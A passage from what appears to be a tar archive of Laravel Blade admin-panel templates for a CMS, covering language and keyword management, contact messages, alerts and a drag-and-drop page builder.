badge-success">{{ __('rtl') }}</span> @endif </td> <td> <a href="{{ url('admin/language-keyword-for-adminpanel/create/'. $language->id) }}" class="btn btn-primary">{{ __('content.for_admin_panel') }}</a> <a href="{{ url('admin/language-keyword-for-frontend/frontend-create/'. $language->id) }}" class="btn btn-primary">{{ __('content.for_frontend') }}</a> </td> <td> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('language.update_display_dropdown', $language->id) }}" method="POST"> @method('PATCH') @csrf @endif @if ($language->display_dropdown == 1) <button type="submit" class="btn btn-danger"> {{ __('content.hide') }} </button> @else <button type="submit" class="btn btn-success"> {{ __('content.show') }} </button> @endif </form> </td> <td> <div> <a href="{{ route('language.edit', $language->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> @if ($language->id != 1) <a href="#" data-toggle="modal" data-target="#deleteModal{{ $language->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $language->id }}" tabindex="-1" role="dialog"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="languageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('language.destroy', $language->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach @php unset($language); @endphp </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="languageModal" tabindex="-1" role="dialog" aria-labelledby="languageModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="languageModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('language.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="language_name">{{ __('content.language_name') }} <span class="text-red">*</span></label> <input type="text" name="language_name" class="form-control" id="language_name" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="language_code">{{ __('content.language_code') }} <span class="text-red">*</span></label> <input type="text" name="language_code" class="form-control" id="language_code" required> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="direction" class="col-form-label">{{ __('content.direction') }} </label> <select class="form-control" name="direction" id="direction"> <option value="0" selected>{{ __('content.select_your_option') }}</option> <option value="0">{{ __('ltr') }}</option> <option value="1">{{ __('rtl') }}</option> </select> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="display_dropdown" class="col-form-label">{{ __('content.display_dropdown') }} </label> <select class="form-control" name="display_dropdown" id="display_dropdown"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1">{{ __('content.show') }}</option> <option value="0">{{ __('content.hide') }}</option> </select> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/language/keyword/for_frontend/create.blade.php������������������������������������������0000644�����������������00000014456�14765366573�0020007 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.for_frontend') }}</h6> <div> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#frontendKeywordModal">+ {{ __('content.add_keyword') }}</button> </div> </div> @if (isset($frontend_keywords)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('frontend-keyword.update_frontend_keyword') }}" method="POST"> @method('PUT') @csrf @endif <input id="language_id" name="language_id" type="hidden" value="{{ $id }}"> <div class="row"> @foreach ($frontend_keywords as $frontend_keyword) <div class="col-md-4"> <div class="form-group"> <label for="{{ $frontend_keyword->id }}" title="{{ $frontend_keyword->key }}">{{ $frontend_keyword->value }} </label> <input type="text" name="value[{{ $frontend_keyword->id }}]" class="form-control" id="{{ $frontend_keyword->id }}" placeholder="{{ $frontend_keyword->key }}" value="{{ $frontend_keyword->value }}"> </div> </div> @endforeach <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <!-- Modal --> <div class="modal fade" id="frontendKeywordModal" tabindex="-1" role="dialog" aria-labelledby="frontendKeywordModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="frontendKeywordModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('frontend-keyword.store_frontend_keyword') }}" method="POST"> @csrf @endif <input id="language_id" name="language_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="key">Key <span class="text-red">*</span></label> <input type="text" name="key" class="form-control" id="key" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="value">Value <span class="text-red">*</span></label> <input type="text" name="value" class="form-control" id="value" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">Please do not use this part unnecessarily. If the developer has forgotten to add a keyword, you can add it yourself here. If you see a keyword like the one below on your site, please get it and create it here. For example, the developer forget to enter the word "Your Comment". In this panel, it will look like this: "content.your_comment" may appear as "frontend.your_comment" on frontend. To create this word, please take only the "your_comment" part from these expressions. It is necessary to create this key. It is recommended to enter Value as "Your Comment". <br> Example use: <br> Key: your_comment <br> Value: Your Comment </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/language/keyword/for_adminpanel/create.blade.php����������������������������������������0000644�����������������00000014273�14765366573�0020275 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.for_admin_panel') }}</h6> <div> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#panelKeywordModal">+ {{ __('content.add_keyword') }}</button> </div> </div> @if (isset($panel_keywords)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('panel-keyword.update_panel_keyword') }}" method="POST"> @method('PUT') @csrf @endif <input id="language_id" name="language_id" type="hidden" value="{{ $id }}"> <div class="row"> @foreach ($panel_keywords as $panel_keyword) <div class="col-md-4"> <div class="form-group"> <label for="{{ $panel_keyword->id }}" title="{{ $panel_keyword->key }}">{{ $panel_keyword->value }} </label> <input type="text" name="value[{{ $panel_keyword->id }}]" class="form-control" id="{{ $panel_keyword->id }}" placeholder="{{ $panel_keyword->key }}" value="{{ $panel_keyword->value }}"> </div> </div> @endforeach <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <!-- Modal --> <div class="modal fade" id="panelKeywordModal" tabindex="-1" role="dialog" aria-labelledby="panelKeywordModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="panelKeywordModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('panel-keyword.store_panel_keyword') }}" method="POST"> @csrf @endif <input id="language_id" name="language_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="key">{{ __('content.key') }} <span class="text-red">*</span></label> <input type="text" name="key" class="form-control" id="key" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="value">{{ __('content.value') }} <span class="text-red">*</span></label> <input type="text" name="value" class="form-control" id="value" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">Please do not use this part unnecessarily. If the developer has forgotten to add a keyword, you can add it yourself here. If you see a keyword like the one below on your site, please get it and create it here. For example, the developer forget to enter the word "Your Comment". In this panel, it will look like this: "content.your_comment" may appear as "frontend.your_comment" on frontend. To create this word, please take only the "your_comment" part from these expressions. It is necessary to create this key. It is recommended to enter Value as "Your Comment". <br> Example use: <br> Key: your_comment <br> Value: Your Comment </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/language/edit.blade.php�����������������������������������������������������������������0000644�����������������00000007357�14765366573�0013322 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.edit_language') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('language.update', $language->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="language_name">{{ __('content.language_name') }} <span class="text-red">*</span></label> <input type="text" name="language_name" class="form-control" id="language_name" value="{{ $language->language_name }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="language_code">{{ __('content.language_code') }} <span class="text-red">*</span></label> <input type="text" name="language_code" class="form-control" id="language_code" value="{{ $language->language_code }}" required> </div> </div> <div class="col-md-12"> <div class="form-group p-0 margin-bottom-20 mt-0"> <label for="direction" class="col-form-label">{{ __('content.direction') }}</label> <select class="form-control" name="direction" id="direction"> <option value="0" selected>{{ __('content.select_your_option') }}</option> <option value="0" {{ $language->direction == 0 ? 'selected' : '' }}>{{ __('ltr') }}</option> <option value="1" {{ $language->direction == 1 ? 'selected' : '' }}>{{ __('rtl') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group p-0 margin-bottom-20 mt-0"> <label for="display_dropdown" class="col-form-label">{{ __('content.display_dropdown') }}</label> <select class="form-control" name="display_dropdown" id="display_dropdown"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $language->display_dropdown == 1 ? 'selected' : '' }}>{{ __('content.show') }}</option> <option value="0" {{ $language->display_dropdown == 0 ? 'selected' : '' }}>{{ __('content.hide') }}</option> </select> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/contact_message/message/index.blade.php�������������������������������������������������0000644�����������������00000014321�14765366573�0016471 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.messages') }}</h6> <div> <form class="d-block ml-auto" action="{{ route('contact-message.mark_all_read_update') }}" method="POST"> @csrf @method('PATCH') <button type="submit" class="btn btn-primary mb-3ine"> <i class="fas fa-bookmark"></i> {{ __('content.mark_all_as_read') }} </button> </form> </div> </div> @if (count($messages) > 0) <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.name') }}</th> <th>{{ __('content.email') }}</th> <th>{{ __('content.phone') }}</th> <th>{{ __('content.message') }}</th> <th>{{ __('content.read_status') }}</th> <th>{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $i = 1; @endphp @foreach ($messages as $message) <tr> <td>{{ $i++ }}</td> <td>{{ $message->name }}</td> <td>{{ $message->email }}</td> <td>{{ $message->phone }}</td> <td>{{ $message->message }}</td> <td> @if($message->read === 0) <span>{{ __('content.unread') }}</span> @else <span>{{ __('content.read') }}</span> @endif </td> <td> <div> @if ($message->read == 0) <form class="d-inline" action="{{ route('contact-message.update', $message->id) }}" method="POST"> @method('PUT') @csrf <button type="submit" data-toggle="tooltip" class="btn btn-primary mr-2 pt-2 pb-2 pr-3 pl-3" data-original-title="{{ __('content.mark') }}"> <i class="fas fa-bookmark"></i> </button> </form> @endif <a href="#" data-toggle="modal" data-target="#deleteModal{{ $message->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $message->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('contact-message.destroy', $message->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/alert/alert.blade.php�������������������������������������������������������������������0000644�����������������00000003045�14765366573�0013016 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div class="row"> <div class="col-12"> @if($message = Session::get('success')) <div id="alert_message" class="alert alert-success custom-alert alert-dismissible fade show" role="alert"> <span>{{ __($message) }}</span> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif @if ($message = Session::get('warning')) <div id="alert_message" class="alert alert-warning custom-alert alert-dismissible fade show" role="alert"> <span>{{ __($message) }}</span> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif @if ($errors->any()) <div id="alert_message" class="alert alert-danger custom-alert alert-dismissible fade show" role="alert"> <strong>{{ __('Whoops!') }}</strong> {{ __('There were some problems with your input.') }}<br><br> <ul> @foreach ($errors->all() as $error) <li>{{ __($error) }}</li> @endforeach </ul> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif </div> </div>�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/page_builder/create.blade.php�����������������������������������������������������������0000644�����������������00000034346�14765366573�0014475 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.pages') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#pageBuilderModal">+ {{ __('content.add_page') }}</button> </div> </div> @if (count($page_builders) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('page-builder.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.page_uri') }}</th> <th>{{ __('content.page_name') }}</th> <th>{{ __('content.is_default') }}</th> <th>{{ __('content.order') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @foreach ($page_builders as $page_name => $pagesWithSamePageName) @foreach ($pagesWithSamePageName as $page) @if ($page->page_name != 'blog-search-index') <tr> <td> @if($page->is_default != 'yes') <input name="check_list[]" type="checkbox" value="{{ $page->id }}" onclick="showHideDeleteButton2(this)"> @else <span class="d-none">.</span> @endif </td> <td>{{ $page->page_uri }}</td> <td>{{ $page->page_name }}</td> <td> @if($page->is_default == 'no') <span class="badge badge-danger">{{ __('content.custom_page') }}</span> @else <span class="badge badge-success">{{ __('content.default_page') }}</span> @endif </td> <td>{{ $page->order }}</td> <td> @if($page->status == 0) <span class="badge badge-danger">{{ __('content.disable') }}</span> @else <span class="badge badge-success">{{ __('content.enable') }}</span> @endif </td> <td> <div> <a href="{{ route('page-builder.edit', $page->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> @if($page->is_default != 'yes') <a href="#" data-toggle="modal" data-target="#deleteModel{{ $page->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> </td> </tr> @if($page->is_default != 'yes') <!-- Modal --> <div class="modal fade" id="deleteModel{{ $page->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('page-builder.destroy', $page->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endif @endif @endforeach @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="pageBuilderModal" tabindex="-1" role="dialog" aria-labelledby="pageBuilderModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="pageBuilderModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('page-builder.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="page_name">{{ __('content.page_names') }} <span class="text-red">*</span></label> <select class="form-control" name="page_name_id" id="page_name" required> @foreach($page_names as $page_name) @if ($page_name->page_name != 'blog-search-index') <option value="{{$page_name->id}}" data-segment-count="{{$page_name->segment_count}}">{{$page_name->page_name}}</option> @endif @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="page_uri">{{ __('content.page_uri') }} <span class="text-red">*</span></label> <input type="text" name="page_uri" class="form-control" id="page_uri" required> <div class="form-text" id="selectedSegmentCountDiv"></div> <small class="form-text">example: 1 segment usage -> about</small> <small class="form-text">example: 2 segment usage -> service/detail</small> <small class="form-text">{{ __('content.please_base_on_the_count_of_segments') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1">{{ __('content.enable') }}</option> <option value="0">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/page_builder/edit.blade.php�������������������������������������������������������������0000644�����������������00000052430�14765366573�0014151 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_page') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('page-builder.update', $page_builder->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> @if (($left_items != null && $page_builder->default_item != null) || ($page_builder->default_item == null && $page_builder->is_default = 'no')) @if ($page_builder->page_name == 'service-detail-show' || $page_builder->page_name == 'service-category-index' || $page_builder->page_name == 'team-detail-show' || $page_builder->page_name == 'team-category-index' || $page_builder->page_name == 'portfolio-detail-show' || $page_builder->page_name == 'portfolio-category-index' || $page_builder->page_name == 'portfolio-search-index' || $page_builder->page_name == 'blog-detail-show' || $page_builder->page_name == 'blog-category-index' || $page_builder->page_name == 'blog-search-index' || $page_builder->page_name == 'blog-tag-index' || $page_builder->page_name == 'career-detail-show' || $page_builder->page_name == 'page-detail-show') <div class="col-md-12"> <div class="form-group"> <label for="page_uri">{{ __('content.page_builder_is_not_available_on_this_page') }} <span class="text-red">*</span></label> </div> </div> @else <div class="col-md-12 mb-3"> <div class="easier-container"> <section class="easier-dropzone source"> <label for="page_uri">{{ __('content.sections') }} </label> @foreach ($left_items as $item) <div class="easier-draggable" id="{{ $item['id'] }}" data-value="{{ $item['folder'] }}" draggable="true"> <button id="{{ $item['id'] }}" type="button" class="btn btn-sm btn-primary btn-icon move-button d-md-none" data-direction="left" style="font-size: 0.875rem; padding: 0.25rem 0.25rem;"> <i class="fas fa-chevron-left"></i> {{ __('content.move') }} <i class="fas fa-chevron-right"></i> </button> <div class="d-flex justify-content-between align-items-center"> <span>{{ $item['id'] }}</span> <a href="#" class="link" data-target="image{{ $loop->iteration }}"><i class="fa fa-eye text-info"></i></a> </div> <img src="{{ asset('uploads/img/dummy/style/'.$item['id'].'.jpg') }}" id="image{{ $loop->iteration }}" class="hide" alt="{{ $item['id'] }}"> </div> @endforeach @unset($item) </section> <section class="easier-dropzone target"> <label for="page_uri">{{ __('content.updated_page_sections') }} </label> <a href="#" data-toggle="modal" data-target="#defaultPageModal{{ $page_builder->id }}"> <i class="fa fa-rotate-left text-danger font-18 ml-2"></i> </a> @if ($page_builder->default_item != null || ($page_builder->default_item == null && $page_builder->updated_item != null)) @if (!empty($page_builder->updated_item)) @foreach (json_decode($page_builder->updated_item, true) as $item) <div class="easier-draggable" id="{{ $item['id'] }}" data-value="{{ $item['folder'] }}" draggable="true"> <button id="{{ $item['id'] }}" type="button" class="btn btn-sm btn-primary btn-icon move-button d-md-none" data-direction="right" style="font-size: 0.875rem; padding: 0.25rem 0.25rem;"> <i class="fas fa-chevron-left"></i> {{ __('content.move') }} <i class="fas fa-chevron-right"></i> </button> <div class="d-flex justify-content-between align-items-center"> <span>{{ $item['id'] }}</span> <a href="#" class="link" data-target="image29{{ $loop->iteration }}"><i class="fa fa-eye text-info"></i></a> </div> <img src="{{ asset('uploads/img/dummy/style/'.$item['id'].'.jpg') }}" id="image29{{ $loop->iteration }}" class="hide" alt="{{ $item['id'] }}"> </div> @endforeach @unset($item) @else @foreach (json_decode($page_builder->default_item, true) as $item) <div class="easier-draggable" id="{{ $item['id'] }}" data-value="{{ $item['folder'] }}" draggable="true"> <button id="{{ $item['id'] }}" type="button" class="btn btn-sm btn-primary btn-icon move-button d-md-none" data-direction="right" style="font-size: 0.875rem; padding: 0.25rem 0.25rem;"> <i class="fas fa-chevron-left"></i> {{ __('content.move') }} <i class="fas fa-chevron-right"></i> </button> <div class="d-flex justify-content-between align-items-center"> <span>{{ $item['id'] }}</span> <a href="#" class="link" data-target="image29{{ $loop->iteration }}"><i class="fa fa-eye text-info"></i></a> </div> <img src="{{ asset('uploads/img/dummy/style/'.$item['id'].'.jpg') }}" id="image29{{ $loop->iteration }}" class="hide" alt="{{ $item['id'] }}"> </div> @endforeach @unset($item) @endif @endif </section> </div> </div> <input type="hidden" name="left_item" class="form-control" id="left_item" value=""> <input type="hidden" name="updated_item" class="form-control" id="updated_item" value="{{ $page_builder->updated_item }}"> @endif @else <div class="col-md-12"> <div class="form-group"> <label for="page_uri">{{ __('content.page_builder_is_not_available_on_this_page') }} <span class="text-red">*</span></label> </div> </div> @endif <div class="col-md-12"> <div class="form-group"> <label for="page_uri">{{ __('content.page_uri') }} <span class="text-red">*</span></label> <input type="text" name="page_uri" class="form-control" id="page_uri" value="{{ $page_builder->page_uri }}"> <small class="form-text">{{ __('segment_count') }} {{ $page_builder->segment_count }}</small> <small class="form-text">example: 1 segment usage -> about</small> <small class="form-text">example: 2 segment usage -> service/detail</small> <small class="form-text">{{ __('content.please_base_on_the_count_of_segments') }}</small> </div> </div> @if ($page_builder->page_name == 'service-category-index' || $page_builder->page_name == 'team-category-index') <input name="breadcrumb_title" type="hidden"> <input name="breadcrumb_item" type="hidden"> @else <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_title">{{ __('content.breadcrumb_title') }} </label> <input id="breadcrumb_title" name="breadcrumb_title" type="text" class="form-control" value="{{ $page_builder->breadcrumb_title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_item">{{ __('content.breadcrumb_item') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="breadcrumb_item" name="breadcrumb_item" class="form-control" rows="3">{{ $page_builder->breadcrumb_item }}</textarea> <small class="form-text text-muted">{{ '<a href="#">Home</a>, Our Blogs' }}</small> </div> </div> @endif <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label"><a href="{{ route('breadcrumb-image.create') }}"> {{ __('content.you_can_also_activate_the_breadcrumb_image_for_all_pages_from_here') }} </a></label><br> <label for="breadcrumb_status" class="col-form-label">{{ 